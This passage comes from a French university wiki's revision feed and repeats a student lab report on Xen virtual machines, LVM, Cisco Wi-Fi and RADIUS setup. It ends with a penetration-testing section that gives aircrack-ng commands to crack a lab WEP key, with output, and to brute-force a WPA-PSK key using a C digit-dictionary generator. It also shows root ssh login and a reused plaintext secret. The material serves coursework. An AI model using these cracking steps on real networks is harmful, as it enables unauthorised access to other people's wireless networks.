 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
'''Configuration de la machine virtuelle'''&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;br /&gt;
&lt;br /&gt;
'''Configuration réseau'''&lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à internet à ma machine virtuelle, je modifie le fichier suivant : &lt;br /&gt;
&lt;br /&gt;
/etc/networks/interfaces &lt;br /&gt;
&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet6 auto&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 10.60.100.173/24&lt;br /&gt;
  up ip address add dev eth0 193.48.57.173/32 ; ip route add default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
  down ip address del dev eth0 193.48.57.173/32 ; ip route del default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Configuration ssh'''&lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à ma machine virtuelle via ssh, je modifie le fichier suivant :&lt;br /&gt;
&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Relancer le service ssh :&lt;br /&gt;
&lt;br /&gt;
 service ssh restart&lt;br /&gt;
&lt;br /&gt;
Pour accéder à la machine virtuelle via ssh il faut desormais taper la commande suivante :&lt;br /&gt;
 ssh@193.48.57.173&lt;br /&gt;
&lt;br /&gt;
== Passerelle capbreton ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une passerelle doit être mise en place sur capbreton, pour relier les VM.&lt;br /&gt;
Il faut modifier le fichier interfaces :&lt;br /&gt;
&lt;br /&gt;
 nano /etc/network/interfaces&lt;br /&gt;
On identifie les ports ethernet sur lesquels nous sommes câblés :&lt;br /&gt;
 ethtool -p ether n&lt;br /&gt;
Avec n numéro de port. &lt;br /&gt;
&lt;br /&gt;
Nous sommes câblés sur les ports suivants :&lt;br /&gt;
- ether7 : fibré pour aller jusqu'au routeur 6509&lt;br /&gt;
- ether6 : fibré pour aller jusqu'au routeur 9200&lt;br /&gt;
&lt;br /&gt;
Configurer la passerelle comme ci-dessous :&lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth6 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
&lt;br /&gt;
Déconfigurer, puis configurer l'interface réseau :&lt;br /&gt;
 ifdown IMA2a5&lt;br /&gt;
 ifup IMAa5&lt;br /&gt;
&lt;br /&gt;
Vérifier la configuration :&lt;br /&gt;
 brctl show&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés wifi ==&lt;br /&gt;
&lt;br /&gt;
'''Réinitialisation des paramètres de la borne wifi :'''&lt;br /&gt;
 erase startup config&lt;br /&gt;
 reload&lt;br /&gt;
&lt;br /&gt;
'''Configuration de base :'''&lt;br /&gt;
 ap&amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
'''Configuration du nom d'hôte :'''&lt;br /&gt;
 ap(config)#hostname SE2A5-AP1&lt;br /&gt;
&lt;br /&gt;
'''Accès ssh :'''&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
'''Sécurisation des accès :'''&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
'''VLAN 173'''&lt;br /&gt;
 aaa authentication login EAP_TOAD group RADIUS_TOAD&lt;br /&gt;
 radius-server host 193.48.57.173 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 aaa group server radius RADIUS_TOAD&lt;br /&gt;
 server 193.48.57.173 auth-port 1812 acct-port 1813&lt;br /&gt;
 exit&lt;br /&gt;
 dot11 ssid TOAD1&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 vlan 173&lt;br /&gt;
 authentication open eap EAP_TOAD&lt;br /&gt;
 authentication network-eap EAP_TOAD&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface g0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio 0&lt;br /&gt;
 no shutdown&lt;br /&gt;
 encryption vlan 173 mode ciphers aes-ccm tkip&lt;br /&gt;
 mbssid&lt;br /&gt;
 ssid TOAD1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration de la liaison routeur 3500 vers 9200 ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Afficher la liste des interfaces du routeur 3500 et leurs états :&lt;br /&gt;
 sh ip interface brief&lt;br /&gt;
On constate que le port G0/39 est désactivé pour le moment.&lt;br /&gt;
Il faut le relier au routeur 3500 via le VLAN 532.&lt;br /&gt;
&lt;br /&gt;
'''Configuration :'''&lt;br /&gt;
 configure t&lt;br /&gt;
 interface G0/39&lt;br /&gt;
 switchport access vlan 532&lt;br /&gt;
 switchport mode access&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''Cassage de clef WEP d'un point d'accès WiFi'''&lt;br /&gt;
- Brancher une clef wifi sur le PC&lt;br /&gt;
&lt;br /&gt;
- Installer le paquet aircrack.ng&lt;br /&gt;
&lt;br /&gt;
- On peut lister les interfaces disponibles, en activant le mode moniteur de la carte réseau :&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
- Passer la carte WiFi en mode moniteur, espion du réseau sans fil :&lt;br /&gt;
 airmon-ng start wlan0mon &lt;br /&gt;
wlan0mon est le nouveau nom de la carte réseau donné par défaut car le précédent est considéré comme trop long par la machine.&lt;br /&gt;
&lt;br /&gt;
- Obtenir les trames WiFi sur tous les canaux :&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
- Noter le SSID de la machine à attaquer, ici cracotte03 : '''04:DA:D2:9C:50:53'''&lt;br /&gt;
&lt;br /&gt;
- Visulaiser les informations de cracotte03 : &lt;br /&gt;
 airodump-ng --channel 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
- Récupérer dans un fichier .cap toutes les données qui transitent sur le channel 3, uniquement les paquets échangés avec cracotte03 :&lt;br /&gt;
 airodump-ng -w lcrack -c 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
J'attends qu'il y ai environ 30 000 trames de volées, ce processus prend un peu de temps.&lt;br /&gt;
&lt;br /&gt;
- Lancer le décryptage de la clef WEP : &lt;br /&gt;
 aircrack-ng lcrack-03.cap&lt;br /&gt;
Résultat :&lt;br /&gt;
  &lt;br /&gt;
                                                                        [00:00:00] Tested 813 keys (got 74481 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 17   F1(96512) E7(85504) BD(84992) 6F(84736) F2(83968) FA(83712) 12(83456) 0E(82688) C8(82176) 6A(81920) 70(81664) 11(81408) 95(81408) E9(81408) 75(81152) &lt;br /&gt;
    1    0/  1   8E(105472) 34(86016) B3(84480) 54(84224) 2A(83456) B9(83456) 87(82688) 06(82432) 64(82432) 65(82176) 21(81920) 8D(81664) 61(81408) 2F(81152) 3C(81152) &lt;br /&gt;
    2    5/  2   7E(83968) 0E(82432) BF(82432) A2(82176) 0A(81920) 9C(81920) A8(81664) DF(81664) E2(81664) A7(81408) B4(81408) 33(80896) 58(80896) 90(80640) 16(80384) &lt;br /&gt;
    3   17/  3   5B(80896) B2(80640) 5A(80384) B1(80384) C4(80384) F6(79616) 03(79360) 33(79360) DA(79360) 73(79104) 9E(79104) 30(78848) 86(78848) AD(78848) D6(78848) &lt;br /&gt;
    4    0/  1   71(107008) 8D(86528) 03(83712) 7A(83712) 5E(83200) AF(82944) 50(82688) CF(82688) 54(82432) C0(82432) 21(82176) BE(81920) CB(81920) 1A(81664) B5(81408) &lt;br /&gt;
        KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:09:99:99:99 ] &lt;br /&gt;
        Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
On constate que 813 clef ont été testées avant de trouver la bonne.&lt;br /&gt;
&lt;br /&gt;
'''Cassage de mot de passe WPA-PSK'''&lt;br /&gt;
&lt;br /&gt;
- Visualiser les interfaces&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
- Noter le SSID de la machine à attaquer :&lt;br /&gt;
 44:AD:D9:5F:87:02  -40        3        0    0   8  54e. WPA2 CCMP   PSK  kracotte03 &lt;br /&gt;
&lt;br /&gt;
- Coder un &amp;quot;dictionnaire&amp;quot; en C. On suppose que la clef WPA est un code de 8 chiffres :&lt;br /&gt;
 vim dico.c&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 int main(void){&lt;br /&gt;
        int x = 0;&lt;br /&gt;
        for(x=0; x&amp;lt;=99999999; x++){&lt;br /&gt;
                 printf(&amp;quot;%08d\n&amp;quot;,x);&lt;br /&gt;
        }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
- Compiler dico.c :&lt;br /&gt;
 gcc -Wall dico.c&lt;br /&gt;
&lt;br /&gt;
- Executer dico.c :&lt;br /&gt;
 ./a.out | more&lt;br /&gt;
&lt;br /&gt;
- Enregistrer le résultat du code dans un fichier txt :&lt;br /&gt;
 ./a.out &amp;gt; dico.txt&lt;br /&gt;
&lt;br /&gt;
- Lancer le traitement de lcrack-03 par dico.txt :&lt;br /&gt;
 aircrack-ng -w dico.txt lcrack-03&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56376</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56376"/>
				<updated>2021-11-18T10:05:18Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Installation de la machine virtuelle */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Connexion sur le disque de virtualisation :'''&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
'''Installation dans la machine virtuelle Xen'''&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Veiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
'''Configuration de la machine virtuelle'''&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;br /&gt;
&lt;br /&gt;
'''Configuration réseau'''&lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à internet à ma machine virtuelle, je modifie le fichier suivant : &lt;br /&gt;
&lt;br /&gt;
/etc/networks/interfaces &lt;br /&gt;
&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet6 auto&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 10.60.100.173/24&lt;br /&gt;
  up ip address add dev eth0 193.48.57.173/32 ; ip route add default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
  down ip address del dev eth0 193.48.57.173/32 ; ip route del default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Configuration ssh'''&lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à ma machine virtuelle via ssh, je modifie le fichier suivant :&lt;br /&gt;
&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Relancer le service ssh :&lt;br /&gt;
&lt;br /&gt;
 service ssh restart&lt;br /&gt;
&lt;br /&gt;
Pour accéder à la machine virtuelle via ssh il faut desormais taper la commande suivante :&lt;br /&gt;
 ssh@193.48.57.173&lt;br /&gt;
&lt;br /&gt;
== Passerelle capbreton ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une passerelle doit être mise en place sur capbreton, pour relier les VM.&lt;br /&gt;
Il faut modifier le fichier interfaces :&lt;br /&gt;
&lt;br /&gt;
 nano /etc/network/interfaces&lt;br /&gt;
On identifie les ports ethernet sur lesquels nous sommes câblés :&lt;br /&gt;
 ethtool -p ether n&lt;br /&gt;
Avec n numéro de port. &lt;br /&gt;
&lt;br /&gt;
Nous sommes câblés sur les ports suivants :&lt;br /&gt;
- ether7 : fibré pour aller jusqu'au routeur 6509&lt;br /&gt;
- ether6 : fibré pour aller jusqu'au routeur 9200&lt;br /&gt;
&lt;br /&gt;
Configurer la passerelle comme ci-dessous :&lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth6 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
&lt;br /&gt;
Déconfigurer, puis configurer l'interface réseau :&lt;br /&gt;
 ifdown IMA2a5&lt;br /&gt;
 ifup IMAa5&lt;br /&gt;
&lt;br /&gt;
Vérifier la configuration :&lt;br /&gt;
 brctl show&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés wifi ==&lt;br /&gt;
&lt;br /&gt;
'''Réinitialisation des paramètres de la borne wifi :'''&lt;br /&gt;
 erase startup config&lt;br /&gt;
 reload&lt;br /&gt;
&lt;br /&gt;
'''Configuration de base :'''&lt;br /&gt;
 ap&amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
'''Configuration du nom d'hôte :'''&lt;br /&gt;
 ap(config)#hostname SE2A5-AP1&lt;br /&gt;
&lt;br /&gt;
'''Accès ssh :'''&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
'''Sécurisation des accès :'''&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
'''VLAN 173'''&lt;br /&gt;
 aaa authentication login EAP_TOAD group RADIUS_TOAD&lt;br /&gt;
 radius-server host 193.48.57.173 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 aaa group server radius RADIUS_TOAD&lt;br /&gt;
 server 193.48.57.173 auth-port 1812 acct-port 1813&lt;br /&gt;
 exit&lt;br /&gt;
 dot11 ssid TOAD1&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 vlan 173&lt;br /&gt;
 authentication open eap EAP_TOAD&lt;br /&gt;
 authentication network-eap EAP_TOAD&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface g0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio 0&lt;br /&gt;
 no shutdown&lt;br /&gt;
 encryption vlan 173 mode ciphers aes-ccm tkip&lt;br /&gt;
 mbssid&lt;br /&gt;
 ssid TOAD1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration de la liaison routeur 3500 vers 9200 ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Afficher la liste des interfaces du routeur 3500 et leurs états :&lt;br /&gt;
 sh ip interface brief&lt;br /&gt;
On constate que le port G0/39 est désactivé pour le moment.&lt;br /&gt;
Il faut le relier au routeur 3500 via le VLAN 532.&lt;br /&gt;
&lt;br /&gt;
'''Configuration :'''&lt;br /&gt;
 configure t&lt;br /&gt;
 interface G0/39&lt;br /&gt;
 switchport access vlan 532&lt;br /&gt;
 switchport mode access&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''Cassage de clef WEP d'un point d'accès WiFi'''&lt;br /&gt;
- Brancher une clef wifi sur le PC&lt;br /&gt;
&lt;br /&gt;
- Installer le paquet aircrack.ng&lt;br /&gt;
&lt;br /&gt;
- On peut lister les interfaces disponibles, en activant le mode moniteur de la carte réseau :&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
- Passer la carte WiFi en mode moniteur, espion du réseau sans fil :&lt;br /&gt;
 airmon-ng start wlan0mon &lt;br /&gt;
wlan0mon est le nouveau nom de la carte réseau donné par défaut car le précédent est considéré comme trop long par la machine.&lt;br /&gt;
&lt;br /&gt;
- Obtenir les trames WiFi sur tous les canaux :&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
- Noter le SSID de la machine à attaquer, ici cracotte03 : '''04:DA:D2:9C:50:53'''&lt;br /&gt;
&lt;br /&gt;
- Visulaiser les informations de cracotte03 : &lt;br /&gt;
 airodump-ng --channel 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
- Récupérer dans un fichier .cap toutes les données qui transitent sur le channel 3, uniquement les paquets échangés avec cracotte03 :&lt;br /&gt;
 airodump-ng -w lcrack -c 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
J'attends qu'il y ai environ 30 000 trames de volées, ce processus prend un peu de temps.&lt;br /&gt;
- Lancer le décryptage de la clef WEP : &lt;br /&gt;
 aircrack-ng lcrack-03.cap&lt;br /&gt;
Résultat :&lt;br /&gt;
  &lt;br /&gt;
                                                                        [00:00:00] Tested 813 keys (got 74481 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 17   F1(96512) E7(85504) BD(84992) 6F(84736) F2(83968) FA(83712) 12(83456) 0E(82688) C8(82176) 6A(81920) 70(81664) 11(81408) 95(81408) E9(81408) 75(81152) &lt;br /&gt;
    1    0/  1   8E(105472) 34(86016) B3(84480) 54(84224) 2A(83456) B9(83456) 87(82688) 06(82432) 64(82432) 65(82176) 21(81920) 8D(81664) 61(81408) 2F(81152) 3C(81152) &lt;br /&gt;
    2    5/  2   7E(83968) 0E(82432) BF(82432) A2(82176) 0A(81920) 9C(81920) A8(81664) DF(81664) E2(81664) A7(81408) B4(81408) 33(80896) 58(80896) 90(80640) 16(80384) &lt;br /&gt;
    3   17/  3   5B(80896) B2(80640) 5A(80384) B1(80384) C4(80384) F6(79616) 03(79360) 33(79360) DA(79360) 73(79104) 9E(79104) 30(78848) 86(78848) AD(78848) D6(78848) &lt;br /&gt;
    4    0/  1   71(107008) 8D(86528) 03(83712) 7A(83712) 5E(83200) AF(82944) 50(82688) CF(82688) 54(82432) C0(82432) 21(82176) BE(81920) CB(81920) 1A(81664) B5(81408) &lt;br /&gt;
        KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:09:99:99:99 ] &lt;br /&gt;
        Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
On constate que 813 clef ont été testées avant de trouver la bonne.&lt;br /&gt;
&lt;br /&gt;
'''Cassage de mot de passe WPA-PSK'''&lt;br /&gt;
&lt;br /&gt;
- Visualiser les interfaces&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
- Noter le SSID de la machine à attaquer :&lt;br /&gt;
 44:AD:D9:5F:87:02  -40        3        0    0   8  54e. WPA2 CCMP   PSK  kracotte03 &lt;br /&gt;
&lt;br /&gt;
- Coder un &amp;quot;dictionnaire&amp;quot; en C. On suppose que la clef WPA est un code de 8 chiffres :&lt;br /&gt;
 vim dico.c&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 int main(void){&lt;br /&gt;
        int x = 0;&lt;br /&gt;
        for(x=0; x&amp;lt;=99999999; x++){&lt;br /&gt;
                 printf(&amp;quot;%08d\n&amp;quot;,x);&lt;br /&gt;
        }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
- Compiler dico.c :&lt;br /&gt;
 gcc -Wall dico.c&lt;br /&gt;
&lt;br /&gt;
- Executer dico.c :&lt;br /&gt;
 ./a.out | more&lt;br /&gt;
&lt;br /&gt;
- Enregistrer le résultat du code dans un fichier txt :&lt;br /&gt;
 ./a.out &amp;gt; dico.txt&lt;br /&gt;
&lt;br /&gt;
- Lancer le traitement de lcrack-03 par dico.txt :&lt;br /&gt;
 aircrack-ng -w dico.txt lcrack-03&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56375</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56375"/>
				<updated>2021-11-18T09:53:58Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Installation de la machine virtuelle */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Connexion sur le disque de virtualisation :'''&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
'''Installation dans la machine virtuelle Xen'''&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Veiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
